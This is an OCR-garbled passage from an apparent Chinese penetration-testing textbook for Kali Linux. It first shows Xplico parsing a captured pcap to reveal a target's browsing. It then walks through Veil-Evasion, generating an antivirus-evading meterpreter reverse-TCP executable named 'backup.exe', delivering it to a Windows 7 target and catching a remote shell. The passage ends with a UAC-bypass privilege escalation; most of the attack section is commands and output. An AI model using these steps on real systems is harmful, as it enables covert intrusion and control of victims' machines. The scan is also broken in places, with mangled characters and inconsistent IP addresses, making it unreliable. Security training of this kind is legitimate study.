执行 以 上 命令 后 ， 运 行 过 程 中 没有 报错 的 话 ， 则 Xplico 工具 就 安装 成 功 了 。 接 下 来 还 
需要 将 Xplico 服务 局 动 , 才 可 以 使 用 。 由 于 Xplico 基于 Web 界面 , 所 以 还 需要 局 动 Apache 


2 服务 。 
局 动 Apache 服务 。 执 行 命令 如 下 所 示 : 


root@kali:~# service apache2 start 
[OK] Start web server: apache2. 


从 输出 的 信息 中 ， 可 以 看 到 Apache2 服务 已 局 动 。 
AQ E: 在 某 个 系统 中 启动 Apache 2 服务 时 ， 可 能 会 出 现 [....] Starting web server: 


apache2apache2: Could not reliably pues the server's fully qualified domain 
name, using 127.0.1.1 for ServerName 信息 。 这 是 因为 Apache 2 服务 器 的 配置 文件 
中 没有 配置 ServerName 选项 ， 该 信息 不 会 影响 Web 服务 器 的 访问 。 


局 动 Xplico 服务 。 执 行 命令 如 下 所 示 : 
root@kali:~# service xplico start 


[....] Starting : XplicoModifying priority to -1 
. Ok 


从 以 上 输出 信息 ， 可 以 看 到 Xplico 服务 已 成 功 启 动 。 现 在 就 可 以 使 用 Xplico 服务 了 。 
【实例 6-4】 使 用 Xplico 工具 解析 捕获 的 pcap 文件 。 具 体操 作 步 又 如 下 所 示 。 
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(了 六 在 浏览 器 中 输入 http://localhost:9876， 将 打开 如 图 6.20 所 示 的 界面 。 


Xplico ..:Users:.. ~ Iceweasel 


File Edit View History Bookmarks Tools Help 


[se | 


[e Xplico ..:Users:.. 


--Language-- s 


Please login 


Username 
xplico 
Password 


Kénhance 


Login 


图 6.20 Xplico 登录 界面 


(2) 该 界面 用 来 登录 Xplico 服务 。Xplico 默认 的 用 户 名 和 密码 部 是 xplico， 输 入 用 户 
名 和 密码 成 功 登录 Xplico 后 ， 将 显示 如 图 6.21 所 示 的 界面 。 
Xplico ..:Pols:.. - Iceweasel nm 


File Edt View History Bookmarks Tools Help 


| iC Xplico ..:Pols:.. | | 
@ [@iocanost:9s76/poisindex CV €J[ Yo alg f 


fr Most Vistedv [flloffensive Security Ñ Kali Linux W Kali Docs MExploit-DB W Aircrack-ng 


Xplico Interface 


Cases List 
Name External Reference Type Actions | 


enhance 


图 6.21 案例 列表 


(3) 从 该 界面 可 以 看 到 没有 任何 内 容 。 默 认 Xplico 服务 中 ， 没 有 任何 案例 及 会 话 。 需 

要 创建 案例 及 会 话 后 ， 才 可 以 解析 pcap 文件 。 首 先 创建 案例 ， 在 该 界面 单 击 左 侧 栏 中 的 
New Case 命令 ， 将 显示 如 图 6.22 所 示 的 界面 。 

| Xplico ..:Pols:.. - Iceweasel BE 

—— 一 一 

4m [@iocathostio876/polsadd Tvg@[Lvcoe a) g Gt 


&yMost Visitedv [Offensive Security Ñ Kali Linux Kali Docs KlilExpioit-DB  WAircrack-ng 


Xplico Interface 


Help Forum Wiki hange passwort 


DATA ACQUISITION 
@ Uploading PCAP capture file/s O Live acquisition 


Case name [Tesi 


External reference 


K enhance 


Create 


图 6.22 新建 案例 
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(4 六 在 该 界面 选择 Uploading PCAP capture file/s， 并 指定 案例 名 。 本 例 中 设置 为 Test， 
然后 单 击 Create 按钮 ， 将 显示 如 图 6.23 所 示 的 界面 。 


Xplico ..:Pols:.. ~ Iceweasel Bae 


File Edit View History Bookmarks Tools Help 
fs Xplico ..:Pols:.. | se | 


«m | & localtwst:9876/puls/index 


0mm 
LiY Goug.e 


Æ Most Visited" [ilorensive Security *« Kali Lirux Ñ Kali Docs KJ Exploit DB WAircrack ng 


Xplico Interface B 
The Case has been created 
Cases List k 
he Name External Reference Type Actions 
enhance Tes: Files Delete t 


图 6.23 新建 的 案例 


(5) 在 该 界面 的 案例 列表 中 显示 了 新 建 的 案例 。 此 时 单 击 Test， 碍 看 案例 中 的 会 话 ， 
如 图 6.24 所 示 。 


Xplico ..:Sols:.. - lceweasel 


File Edit View History Bookmarks Tools Help 
I Xplico ..:Sols:.. | 中 | 
ES @ Localhost: 9876/sols/index 


| v Google Q Lb em 


£y Most Visitedv fllOffensive Security "Ñ Kali Linux Kali Docs KliExploit-DB WAircrack-ng 


Xplico Interface 


Helr F( 


List of listening sessions of case: Test 
Start Time 


Status Actions 


End Time 


» Cases Name 


«nhance 


图 6.24 ”监听 的 会 1 


(6) 从 该 界面 可 以 看 到 没有 任何 会 话 信 息 ， 接 下 来 创建 会 话 。 单 击 左 侧 栏 中 的 New 
Session 命令 ， 将 显示 如 图 6.25 所 示 的 界面 。 


Xplico ..:Sols:.. - Iceweasel mmm M 


File Edit View History Bookmarks Tools Help 
© Xplico ..:Sols:.. | de 


@ Localhiost: 9876/sols/add 


Session name Windows XP target 
Create 


enhance 


图 6.2$ ”新建 会 话 
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(7 六 在 该 界面 Session name 对 应 的 文本 框 中 输入 想 创建 的 会 话 名 ， 然 后 单 击 Create TZ 
钮 ”将 显示 如 图 6.26 所 示 的 界面 。 


Xplico ..:Sols:.. ~ Iceweasel ey cius 


File Edit View History Bookmarks Tools Help 


iC Xplico .. :Sols:.. [| 
<a |@localhost:9876/solsindex ?ve localhost: 9876/sols/index in |@localhost:9876/solsindex ?ve LjY Google 


Most Visitedv [JOffensive Security \ Kali Linux “& Kali Docs ERExploit-DB W Aircrack-ng 


Xplico Interface 


The Session has been created 


List of listening sessions of case: Test 


Name Start Time End Time Status 
WindowsXPtarget 0000-00-00 00:00:00 0000-00-00 00:00:00 EMPTY 


图 6.26 新建 的 会 话 


(8) 从 该 界面 可 以 看 到 新 建 了 一 个 名 为 Windows XP Target 的 会 话 。 此 时 进入 该 会 话 
中 ， 就 可 以 加 载 pcap 文件 解析 分 析 了 。 单 击 会 话 名 WindowsXPtarget， 将 显示 如 图 6.27 所 
示 的 界面 。 


Xplico ..:Sols:.. ~ Iceweasel TRY 


File Edit View History Bookmarks Tools Help 
[s Xplico ..:Sols:.. | ce | 


«M | @ locathost:9876/sols/view/1 


Case and Session 
name Test -> WindowsXPtarget 


essior Cap. Start Time 0000-00-00 00:00:00 
© Graphs Cap. End Time 0000-00-00 00:00:00 
Status EMPTY 
Hosts . 


© Mail 

m 

© Share ni » " 

© Chat Number O 


Received o — 7 
S Contents o Sent o Connectianso Received o 
- Video 0 Unreadedo/0 Download»do Sent 0 
© Undecoded images 0 Uploadedo - 0 


图 6.27 ”上传 pcap 文件 


(9) 该 界面 是 用 来 显示 pcap 文件 详细 信息 的 。 目 前 还 没有 上 传 任 何 pcap 文件 ， 所 以 
单 击 Browse 按钮 选择 要 解析 的 捕获 文件 。 然 后 单 击 Upload 按钮 ， 将 显示 如 图 6.28 所 示 的 
界面 。 

(10) 从 该 界面 可 以 看 到 pcap 文件 分 为 几 个 部 分 。 关 于 pcap 文件 的 每 类 型 数据 包 ， 可 
以 对 应 的 查看 。 该 界面 显示 了 10 种 类 型 ， 如 HTTP、MMS、Emails、FTP-TFTP-HTT?P file 
和 Web Mail 等 。 在 该 界面 单 击 左 侧 栏 中 的 Web 并 选择 Site 命令 ,将 显示 如 图 6.29 所 示 的 
界面 。 
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Xplico ..:Sols:.. - Iceweasel a aui ad ha 


File Edit View History Bookmarks Tools Help 


© Connecting... | op | 


c @ Localhost:9876/sols/view/1 vo i 


Ey Most Visitedv [{JOffensive Security Ñ Kali Linux “A Kali Docs MJExploit-DB W Aircrack-ng 


Xplico Interface - 


Case and Session name Test -» Windows7Target PCAP-over-IP TCP port: 30002. 
Cap. Start Time 2014-07-03 14:11:43 Add new pcap file. 


Session Cap. End Time 2014-07-03 14:12:08 
oum Status DECODING COMPLETED No file selected. 
O Web Hosts $ Upload 
e 


O Mail Filter List of all pcap files. 


k 
Om — —) (Wü — —) (Es i | (Wed — 


Post Number 0 Received O Total 0 


0 
Get 0 Contents 0 Sent 0 Connections. 0 Received 0 
Video 0 Video 0 Unreaded 0/0 Downloade- o Sent 0 
0 


Uploaded 0-0 
Kénhance Images Images 0 HTTP 


Server 0 DNS res 2 Video 0 Groups 0 
Users Channels 0/0/0 ARP/ICMPY& /0 Audio 0 Articles 0 


Waiting for Localhost... 


图 6.28 成 功 上 传 了 捕获 文件 


Xplico ..:Webs:.. - Iceweasel - QO LX. 
File Edit View History Bookmarks Tools Help 
C. Xplico ..:Webs:.. | | 
+ Le 


Ey Most Visitedv Offensive Security Ñ Kali Linux “A Kali Docs KliExptoit-DB W Aircrack-ng 


For a complete view of html page set your browser to use Proxy, and point it to 


bata 


Web URLs: — 9 Html O Image O Flash Ovideo O Audio O JSON 


Search: OAII 

Go 
Date Url | = Size Method Info | 
2014-07-17 16:14:56 image.baidu.com/data/imginfo7?picture_id=104878412164colun 981 GET info.xml 


2014-07-17 16:14:50 image.baidu.com/data/imginfo7picture_id=104877982454colun 972 GET info ,xml 
Share 

[Ochat | 2014-07-17 16:14:46image.baidu.com/data/imginfo?picture_id=12156538016&colun 981 GET info.xml 

© Shell 2014-07-17 16:14:42 image.baidu.com/data/imginfo?picture_id=104878462354colun 985 GET info.xml 


© Undecoded 2014-07-17 16:14:37 whois.pconline.com.cn/ipjJson.jsp?callback=cmt4_getAreaBack 162 GET info .xml 


(enhance 2014-07-17 16:14:37 pos.baidu.com/ecom?cec=g023124dai=1&cfv=6 &cpa=1&col=zh- 38243 GET info.xml 
2014-07-17 16:14:36 8dz5za.v.admaster.com.cn/i/a20610,b200450151,c2289,i0,m: 0 GET info.xml 
2014-07-17 16:14:36 stat.aa.sdo.com/?action=cm&src=Admasterauid=14071709313' 2 GET info.xml 
2014-07-17 16:14:36 www.baidu.com/ur/scun?title=%E3%80%90Win7T%E5%A3%81%E7 2507 GET info.xml 
2014-07-17 16:14:36 omt.pconline.com.con/entry.jsp?url=http%3A/ /wallpaper.pconline. 20392 GET info.xml 
2014-07-17 16:14:35wallpaper.pconline.com.cn/pic/3604.html 25587 GET info.xml 
2014-07-17 16:13:58 image.baidu.com/data/imginfo?picture_id=104878094394colun 971 GET info.xml 
2014-07-17 16:13:47 image.baildu.com/detall /newindex?col=%E5%A3%81%E7 **BAXBB 51865 GET info.xml 
2014-07-17 16:13:44 image.baidu.com/channel/getpicinfo7idlist-12156538016%2C1 431 GET info.xml 
2014-07-17 16:13:43image.baidu.com/channel/listjson?pnzO&rnz24&tag1- *E5*A3* 7191 GET info.xml 
2014-07-17 16:13:41 image.baidu.com/channel/wallpaper 27144 GET info.xml 


Previous = THATS TA CLES Nt b 


图 6.29 ”显示 了 捕获 文件 中 的 站 点 


(11) 该 界面 显示 了 捕获 文件 中 所 有 访问 的 站 点 ， 从 该 界面 的 底部 可 以 看 到 共有 8 页 
言 息 。 在 该 界面 也 可 以 进行 搜索 。 例 如 搜索 baidu， 将 显示 如 图 6.30 所 示 的 界面 。 
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Xplico ..:Webs:.. - Iceweasel 


File Edit View History Bookmarks Tools Help 


iC. Xplico ..:Webs:.. 


@ | @ localhost. 9876/webs d i 


Ex Most Visitedv JJOffensive Security Ñ Kali Linux “A Kali Docs KliExploit-DB W Aircrack-ng 


© Graphs 


© Voip 
© Share 


(enhance 


[è] 


For a complete view of html page set your browser to use Proxy, and 
point it to Web server. 


Web URLs: 


(€ Html O Image OFlash 


OJSON Oall 


Search:  baidu 


Date Url 


2014-07-17 
2014-07-17 
2014-07-17 
2014-07-17 
2014-07-17 
2014-07-17 
2014-07-17 
2014-07-17 
2014-07-17 
2014-07-17 
2014-07-17 
2014-07-17 
2014-07-17 
2014-07-17 
2014-07-17 
2014-07-17 


16:14:56 image.baidu.com/data/imginfo?picture_id=10487841 
16:14:50 image.baidu.com/data/imginfo?picture_id=1048779& 
16:14:46 image.baidu.com/data/imginfo?picture_id=1215653€ 
16:14:42 image.baidu.com/data/imginfo?picture_id=1048784€ 
16:14:37 pos.baidu.com/ecom?cec-gb2312&dai-1&cfv-6&cpa 
16:14:36 www.baidu.com/ur/scun?titie-*$E39€$4B809*90Win7 9€ E5* 
16:14:36 cmt.pconline.com.con/entry.jsp?urishttp* 3A/ /wallpapt 
16:13:58 image.baidu.com/data/imginfo?picture_id=1048780¢ 
16:13:47 image.baidu.com/detail /newindex?col=%XE5%A3%81% 
16:13:44 image.baidu.com/channel/getpicinfo7idlist=-121565=2 
16:13:43 image.baidu.com/channel/listison?pn=04rn=244tagi 
16:13:41 image.baidu.com/channel/wallpaper 

16:13:36 image.baidu.com/ 

16:13:33 www.baidu.com/ 

16:13:19 pos.baidu.com/ecom?cec=utf-8&dai=54cfv=6 &cpa=1 
16:13:18 pos.baidu.com/ecom?cecsutf-B&dals3&cfvs 6 &cpas 1. 


图 6.30 ”搜索 结果 
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info 
info.xml 


info.xml 
Info .xml 
info.xml 
info.xml 
info.xml 
Info.xml 
info.xml 
info.xml 
info.xml 
Info .xml 
info.xml 
info.xml 
info.xml 
Info.xmi 


Info .xml 


(12) 从 该 界面 可 以 看 到 ， 搜 索 的 结果 共有 3 页 。 如 果 想 查看 目标 系统 访问 过 的 图 片 ， 
单 击 左 侧 栏 中 的 Image 选项 ， 将 显示 如 图 6.31 所 示 的 界面 。 


Xplico ..:Webs:.. - Iceweasel 
File Edit View History Bookmarks Tools Help 
R Xplico ..:Webs:.. Ed 
«€ | @ locathost:9876/webs/images ve iL 


Ex Most Visitedv [lJOffensive Security Kali Linux “A Kali Docs [JExploit-DB W Aircrack-ng 


Xplico Interface 


© Case 


| 
Web 
Site A 


Images f.hiphotos.baidu.com d.hiphotos.baidu.com h.hiphotos.baidu.com 


O Mail Image or Page Image or Page Image or Page 
Q Voip 


Share 


© 
© chat 


Search: 


c.hiphotos Daidu.com 
Image or Page 


© Shell | 


b.hiphotos.baidu.com 
Image or Page 


b.hiphotos.baidu.com 
Image or Page 


e.hiphotos.baidu.com 
Image or Page 


imgstat.baidu.com 
Image or Page 


© Undecoded 


[enhance 


imgstat.baidu.com 
Image or Page 


b.hiphotos.baidu.com 
Image or Page 


a.hiphotos.baidu.com 
Image or Page 


c.hiphotos.baidu.com 
Image or Page 


图 6.31 访问 的 图 片 
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C13) 从 该 界面 可 以 看 到 目标 系统 访问 过 的 所 有 图 片 信息 。 
6.5 7 Payload 生成 工具 Veil 


Veil 是 一 于 利用 Metasploit HEISE p HAE 2€] Payload 工具 ,并 且 在 大 多 数 网 络 环境 中 
能 绕 过 第 见 的 杀毒 软件 。 本 节 将 介绍 Veil 工具 的 安 闭 及 使 用 。 
在 Kali Linux 中 ， 默 认 没 有 安装 Veil 工具 。 这 里 首先 安装 Veil 工具 ， 执 行 如 下 所 示 的 


命令 : 
root@kali:~# apt-get install veil 


执行 以 上 命令 后 ， 如 果 安 装 过 程 没 有 提示 错误 的 话 ， 则 表示 Veil 工具 安装 成 功 。 由 于 
安装 该 工具 依赖 的 软件 较 多 ， 所 以 此 过 程 时 间 有 点 长 。 
启动 Vel 工具 。 执 行 命令 如 下 所 示 : 


root@kali:~# veil-evasion 


执行 以 上 命令 后 ， 将 会 输出 大 量 的 信息 。 如 下 所 示 : 


[*] Initializing Apt Dependencies Installation 

[*] Adding 1386 Architecture To x86 64 System 

[*] Updating Apt Package Lists 

命中 http://mirrors.ustc.edu.cn kali Release.gpg 

命中 http://mirrors.ustc.edu.cn kali/updates Release.gpg 

命中 http://mirrors.ustc.edu.cn kali Release 

命中 http://mirrors.ustc.edu.cn kali/updates Release 

命中 http://mirrors.ustc.edu.cn kali/main Sources 

命中 http://mirrors.ustc.edu.cn kali/non-free Sources 

命中 http://mirrors.ustc.edu.cn kali/contrib Sources 

命中 http://mirrors.ustc.edu.cn kali/main amd64 Packages 
命中 http://mirrors.ustc.edu.cn kali/non-free amd64 Packages 
命中 http://mirrors.ustc.edu.cn kali/contrib amd64 Packages 
获取 : 1 http://mirrors.ustc.edu.cn kali/main i386 Packages [8,474 kB] 
命中 http://http.kali.org kali Release.gpg 

命中 http://security.kali.org kali/updates Release.gpg 

命中 http://http.kali.org kali Release 


IN 
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忽略 http://http.kali.org kali/non-free Translation-en 
T£ 17.8 MB， 耗 时 20 f^ (859 kB/s) 
正在 读 取 软件 包 列 表 ... 完成 
[*] Installing Wine i386 Binaries 
正在 读 取 软件 包 列表 .… 完成 
正在 分 析 软 件 包 的 依赖 关系 树 
正在 读 取 状态 信息 ... 完成 
会 安装 下 列 额外 的 软件 包 : 
gcc-4./-base:i386 libasound2:1386 libc-bin libc-dev-bin libc6 libc6:i386 
libc6-dev libc6-1686:1386 libdbus-1-3:1386 libdrm-intel1 i386 
libdrm-nouveau1a:i386 libdrm-radeon1:1386 libdrm2:1386 libexpat1:1386 
libffi5:1386 libfontconfig1:1386 libfreetype6:1386 libgcc1:1386 
[*] Cleaning Up Setup Files 
[*] Updating Veil-Framework Configuration 
Veil-Framework configuration: 
[x] OPERATING SYSTEM = Kali 
[*] TERMINAL CLEAR = clear 
[*] TEMP DIR = /tmp/ 
[*] MSFVENOM_OPTIONS = 
[*] METASPLOIT PATH = /usr/share/metasploit-framework/ 
[x] PYINSTALLER PATH = /usr/share/pyinstaller/ 
[*] VEIL EVASION PATH = /usr/share/veil-evasion/ 
[*] PAYLOAD SOURCE PATH = /root/veil-output/source/ 
[*] Path "/root/veil-output/source/ Created 
[x] PAYLOAD COMPILED PATH = /root/veil-output/compiled/ 
[*] Path "/root/veil-output/compiled/ Created 
[*] Path '"/root/veil-output/handlers/ Created 
[*] GENERATE HANDLER SCRIPT = True 
[*] HANDLER PATH = /root/veil-output/handlers/ 
[*] HASH LIST = /root/veil-output/hashes.txt 
[*] VEIL CATAPULT PATH = /usr/share/Veil-Catapult/ 
[*] Path "/root/veil-output/catapult/ Created 
[*] CATAPULT RESOURCE PATH = /root/veil-output/catapult/ 
[*] Path "/etc/veil/ Created 


Configuration File Written To "/etc/veil/settings.py' 


以 上 信息 只 有 在 第 一 次 运行 Veil 时 才 显 示 。 在 此 过 程 中 ， 初始 化 一 些 脚 本 、 软 件 包 列 
表 、 更 新 配置 及 安装 需要 的 软件 包 。 在 此 过 程 中 以 图 形 界 面 的 形式 依次 安装 了 Python K'E 
的 两 个 模块 pywin32-218 和 pycrypto-2.6. 下面 依 次 进行 安装 。 首先 弹 出 的 对 话 框 , 如 图 6.32 
所 示 。 

该 界面 是 安装 Python 的 初始 界面 。 这 里 使 用 默认 设置 ， 单 击 Next 按钮 ， 将 显示 如 图 
6.33 所 示 的 界面 。 

在 该 界面 单 击 Next 按钮 ,将 显示 如 图 6.34 所 示 的 界面 。 该 界面 提示 C:\Python27 已 存 
在 ， 确 认 是 否 要 乾 兰 已 存在 的 文件 。 这 里 单 击 Yes 按钮 ， 将 显示 如 图 6.35 所 示 的 界面 。 
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Python 2.7.5 Setup Python 2.7.5 Setup 


图 6.34 确认 Python 的 安装 位 置 图 6.35 Ase X Python 
在 该 界面 目 定 义 安 装 Python 的 一 些 功能 。 这 里 使 用 默认 的 设置 ， 单 击 Next 按钮 ， 将 
显示 如 图 6.36 所 示 的 界面 。 


Python 2.7.5 Setup 


pythe 
windows 


图 6.36 ”安装 完成 
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M 


提示 Python 已 经 安装 完成 。 此 时 单 击 Finish 按钮 ， 将 显示 如 图 6.37 所 示 的 界面 。 


soe 


PYTHON 
Powered 


图 6.37 ”安装 pywin32-218 模块 界面 


该 界面 是 要 求 安 装 pywin32-218 模块 。 这 里 单 击 “下 一 步 ”按钮 ， 将 显示 如 图 6.38 所 
示 的 界面 。 


PYTHON 


POUerecg 


图 6.38 KAS 
这 里 使 用 默认 设置 ， 单 击 “ 下 一 步 ” 按 钮 ， 将 显示 如 图 6.39 所 示 的 界面 。 


图 6.39 ”准备 安装 


" 


SN 
SG" 


."————————————-'"-"-"--""—-—— 
S 最 未 如 图 6.40 所 示 的 界面 。 
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图 6.40 ”安装 完成 


从 该 界面 可 以 看 到 pywin32-218 模块 已 经 安装 完成 。 此 时 单 击 “ 结 束 ” 按 钮 ， 将 显示 
如 图 6.41 所 示 的 界面 。 


6.41 ”安装 pycrypto-2.6 模块 初始 界面 
该 界面 提示 需要 安装 pycrypto-2.6 模块 。 这 里 单 击 “ 下 一 步 ” 按 钮 开始 安装 ， 如 图 642 所 示 。 


图 6.42 设置 向 导 
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这 里 使 用 默认 设置 ， 单 击 “ 下 一 步 ” 按 钮 ， 将 显示 如 图 6.43 所 示 的 界面 。 


yo’ 


PYTHON 


Powered 


图 6.43 ”准备 安装 


该 界面 提示 将 要 安装 pycrypto 模块 。 这 里 单 击 “ 下 一 步 ” 按 钮 ,将 显示 如 图 6.44 所 示 
的 界面 。 


图 6.44 安装 完成 


从 该 界面 可 以 看 到 以 上 软件 包 已 安装 完成 。 此 时 单 击 “ 结 束 ” 按 钮 ， 将 显示 如 下 所 示 
的 信息 : 
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clean clean out payload folders 
checkvt check payload hashes vs. VirusTotal 
exit exit Veil 


[>] Please enter a command: 


从 以 上 信息 中 可 以 看 到 在 Veil F, A 24 个 攻击 载 何 可 加 载 ， 并 列 出 了 可 用 的 命令 。 
现在 束 可 以 进行 各 种 操作 了 。 例 如 合 看 可 加 载 的 攻击 模块 ， 执 行 命令 如 下 所 示 : 


[>] Please enter a command: list 


[*] Available payloads: 
1) c/meterpreter/rev tcp 
2) c/meterpreter/rev tcp service 
3)  c/shellcode inject/virtual 
4)  c/shellcode inject/void 
5) cs/meterpreter/rev tcp 
6) cs/shellcode inject/base64 substitution 
T) cs/shellcode inject/virtual 
8) native/Hyperion 
9)  native/backdoor factory 
10) native/pe scrambler 
11) powershell/shellcode inject/download virtual 
12) powershell/shellcode inject/psexec virtual 
13) powershell/shellcode inject/virtual 
14) python/meterpreter/rev http 
15) python/meterpreter/rev http contained 
16) python/meterpreter/rev https 
17) python/meterpreter/rev https contained 
18) python/meterpreter/rev tcp 
19) python/shellcode inject/aes encrypt 
20) python/shellcode inject/arc encrypt 
21) python/shellcode inject/base64 substitution 
22) python/shellcode inject/des encrypt 
23) python/shellcode inject/flat 
24) python/shellcode inject/letter substitution 


从 输出 的 信息 中 ， 可 以 看 到 有 24 个 可 用 的 攻击 载荷 。 此 时 可 以 利用 任何 一 个 攻击 载 
何 ， 进 行 渗透 攻击 。 

【实例 6-5) 演示 使 用 Veil 工具 中 的 载 傈 (本 例 以 cs/meterpreter/rev tep 为 例 ) ， 进 行 
渗透 攻击 (这 里 以 Windows 7 作为 攻击 靶 机 )〉 。 具 体操 作 步 又 如 下 所 示 。 

(OD 启动 Veil 工具 。 执 行 命令 如 下 所 示 : 


root@kali:~# veil-evasion 


执行 以 上 命令 后 ， 将 显示 如 下 所 示 的 信息 : 


Main Menu 
24 payloads loaded 
Available commands: 
use use a specific payload 
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info information on a specific payload 

list list available payloads 

update update Veil to the latest version 
clean clean out payload folders 

checkvt check payload hashes vs. VirusTotal 
exit exit Veil 


[>] Please enter a command: 


在 输出 的 信息 中 看 到 [>] Please enter a command: ER it, Sos Veil 登录 成 功 了 。 
(2) 选择 cs/meterpreter/rev tcp 攻击 载 何 。 在 攻击 载 何 列表 中 ，cs/meterpreter/rev_tcp 
载 傈 的 编写 是 5。 执 行 命令 如 下 所 示 : 


[>] Please enter a command: use 5 


Payload: cs/meterpreter/rev_tcp loaded 


Required Options: 
Name Current Value Description 
LHOST IP of the metasploit handler 
LPORT 4444 Port of the metasploit handler 
compile to exe Y Compile to an executable 
Available commands: 
set set a specific option value 
info show information about the payload 
generate generate payload 
back go to the main menu 
exit exit Veil 


[>] Please enter a command: 


输出 信息 显示 了 rev tcp Mih g tr n] Bo AA EITM a Be. IK E ERA H E HIE Hh i O 
(LPORT) & 4444, LHOST 选项 还 没有 配置 。 
(3) 配置 LHOST 选项 参数 ， 并 查看 攻击 载荷 的 详细 信息 。 执 行 命令 如 下 所 示 : 


[>] Please enter a command: set LHOST 192.168.6.103 
[>] Please enter a command: info 


Payload information: 


Name: cs/meterpreter/rev_tcp 
Language: CS 
Rating: Excellent 
Description: — pure windows/meterpreter/reverse_tcp stager, no 
shellcode 
Required Options: 
Name Current Value Description 
LHOST 192.168.6.100 IP of the metasploit handler 
LPORT 4444 Port of the metasploit handler 
compile to exe Y Compile to an executable 


从 输出 的 信息 中 ， 可 以 看 到 rev_tcp 攻击 载 傈 的 详细 信息 ， 如 攻击 载 何 名 、 语 言 、 级 
别 及 配置 的 选项 参数 等 。 
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CAIRT, fH] generate 命令 生成 载荷 文件 。 执 行 命令 如 下 所 示 : 


[>] Please enter a command: generate 


[*] Press [enter] for ‘payload’ 
[>] Please enter the base name for output files: backup # 指 定 输 出 文件 名 


在 以 上 命令 中 指定 一 个 文件 名 为 backup。 然 后 按 下 回 车 键 ， 将 显示 如 下 所 示 的 信息 : 


[*] Executable written to: /root/veil-output/compiled/backup.exe 


Language: CS 
Payload: cs/meterpreter/rev_tcp 
Required Options: LHOST=192.168.6.103 LPORT=4444 compile to exe-Y 
Payload File: /root/veil-output/source/backup.cs 
Handler File: /root/veil-output/handlers/backup_handler.rc 


[*] Your payload files have been generated, don't get caught! 


[!] And don't submit samples to any online scanner! ;) 
[>] press any key to return to the main menu: 


从 输出 的 信息 中 可 以 看 到 生成 一 个 可 执行 文件 backup.exe， 并 且 该 文件 保存 在 
/root/vell-output/compiled/ 中 。 此 时 将 可 执行 文件 backup.exe 发 送 到 目标 主机 上 ， 束 可 以 利 
用 该 攻击 载荷 了 。 

接 下 来 需要 使 用 Metasploit 创建 一 个 远程 处 理 器 ,等 待 aii 车 接 到 Kali Linux (JX 
击 主 机 ) 操作 系统 。 连 接 成 功 后 ， 束 获取 到 一 个 远程 Shell 命令 。 

【实例 6-6】 创建 远程 处 理 器 。 具 体操 作 步 又 如 下 所 示 。 

(1) 启动 MSF 终端 

(2) 使 用 handler 模块 。 执 行 命令 如 下 所 示 : 


msf > use exploit/multi/handler 


(3) 加 载 reverse tcp 攻击 载 何 ， 并 设置 其 选项 参数 。 执 行 命令 如 下 所 示 : 


msf exploit(handler) > set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse_tcp 

msf exploit(handler) > set LHOST 192.168.6.103 

LHOST => 192.168.6.103 


(4) 局 动 渗透 攻击 。 执 行 命令 如 下 所 示 : 


msf exploit(handler) > exploit 
[*] Started reverse handler on 192.168.6.103:4444 


[*] Starting the payload handler... 

从 输出 信息 可 以 看 到 攻击 载荷 已 启动 ， 正 在 等 待 连接 目标 主机 。 

此 时 将 前 面 生 成 的 可 执行 文件 backup.exe 发 送 到 目标 主机 (Windows 7) ， 并 运行 该 
可 执行 文件 。 然 后 返回 到 Kali Linux 操作 系统 ， 将 看 到 如 下 所 示 的 信息 : 

[*] Sending stage (769536 bytes) to 192.168.6.110 

[*] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.110:2478) at 2014-07-17 


10:44:47 +0800 
meterpreter > 


从 以 上 信息 中 ， 可 以 看 到 成 功 打开 了 一 个 Meterpreter 会 话 。 这 表示 已 成 功 渗透 攻击 日 


ui ot i 
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标 主 栅 ,现在 就 可 以 进行 一 些 Shell 命令 。 如 进行 目标 主机 的 Shell 环境 ， 执 行 命令 如 下 
Wizh: 

meterpreter > shell 

Process 1544 created. 

Channel 1 created. 

Microsoft Windows [O03 6.1.7601] 


口 口 口 口 口 口 口 (c) 2009 Microsoft Corporation 品 口 口 口 口 口 口 口 口 口 口 口 
C:\Users\lyw\Desktop> 


输出 的 信息 表示 进入 了 目标 系统 Windows 7 的 命令 行 ， 并 且 当 前 目标 系统 登录 的 用 户 
是 lyw. 

如 果 以 上 用 户 没 有 太 忆 权限 时 , 可 以 使 用 Metasploit 中 的 bypassuac ARSE UAC (用 
户 访问 控制 ) ， 进 而 提升 用 户 的 权限 。 下 面 将 介绍 使 用 bypassuac 模块 提升 以 上 lyw 用 户 
的 权限 。 

(1) 将 Meterpreter 会 话 ， 调 用 到 后 台 和 运行。 执行 命令 如 下 所 示 : 


meterpreter > background 
[*] Backgrounding session 1... 


从 输出 的 信息 中 ， 可 以 看 到 当前 后 台 运 行 的 会 话 编号 是 1。 该 会 话 编号 需要 记 住 ， 在 
后 面 将 会 用 到 。 
(2) 但 看 会 话 详细 信息 。 执 行 命令 如 下 所 示 : 


msf exploit(handler) > sessions 
Active sessions 


Id Type Information Connection 


1 meterpreter x86/win32 WIN-RKPKQFBLG6C\bob @ WIN-RKPKQFBLG6C 
192.168.6.103:4444 -> 192.168.6.106:49199 (192.168.6.106) 


从 输出 信息 中 可 以 看 到 该 会 话 中 ， 连 接 到 目标 系统 的 运行 架构 、 计 算 机 名 及 IP 地 址 。 
(3) 使 用 bypassuac 模块 ， 并 查看 可 配置 的 选项 参数 。 执 行 命令 如 下 所 示 : 


msf exploit(handler) > use exploit/windows/local/bypassuac 
msf exploit(bypassuac) > show options 
Module options (exploit/windows/local/bypassuac): 


Name Current Setting Required Description 

SESSION yes The session to run this module on. 
Payload options (windows/meterpreter/reverse_tcp): 

Name Current Setting Required Description 

EXITFUNC process yes Exit technique (accepted: seh, thread, process, 
none) 

LHOST 192.168.6.103 yes The listen address 

LPORT 4444 yes The listen port 
Exploit target: 

Id Name 


0 Windows x86 


从 输出 信息 中 , 可 以 看 到 模块 选项 中 有 一 个 可 配置 的 选项 参数 SESSION 。 该 选项 的 值 ， 
就 是 当前 后 台 运 行 的 会 话 编号 。 
(4) 设置 SESSION 选项 参数 。 如 下 所 示 : 
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msf exploit(bypassuac) > set session 1 
session => 1 


(5) 局 动 渗透 攻击 。 执 行 命令 如 下 所 示 : 


msf exploit(bypassuac) > exploit 
[*] Started reverse handler on 192.168.6.103:4444 
[*] UAC is Enabled, checking level... 


[+] UAC is set to Default 

[+] BypassUAC can bypass this setting, continuing... 
[+] Part of Administrators group! Continuing... 

[*] Uploaded the agent to the filesystem.... 


[*] Uploading the bypass UAC executable to the filesystem... 

[*] Meterpreter stager executable 73802 bytes long being uploaded.. 

[*] Sending stage (769536 bytes) to 192.168.6.106 

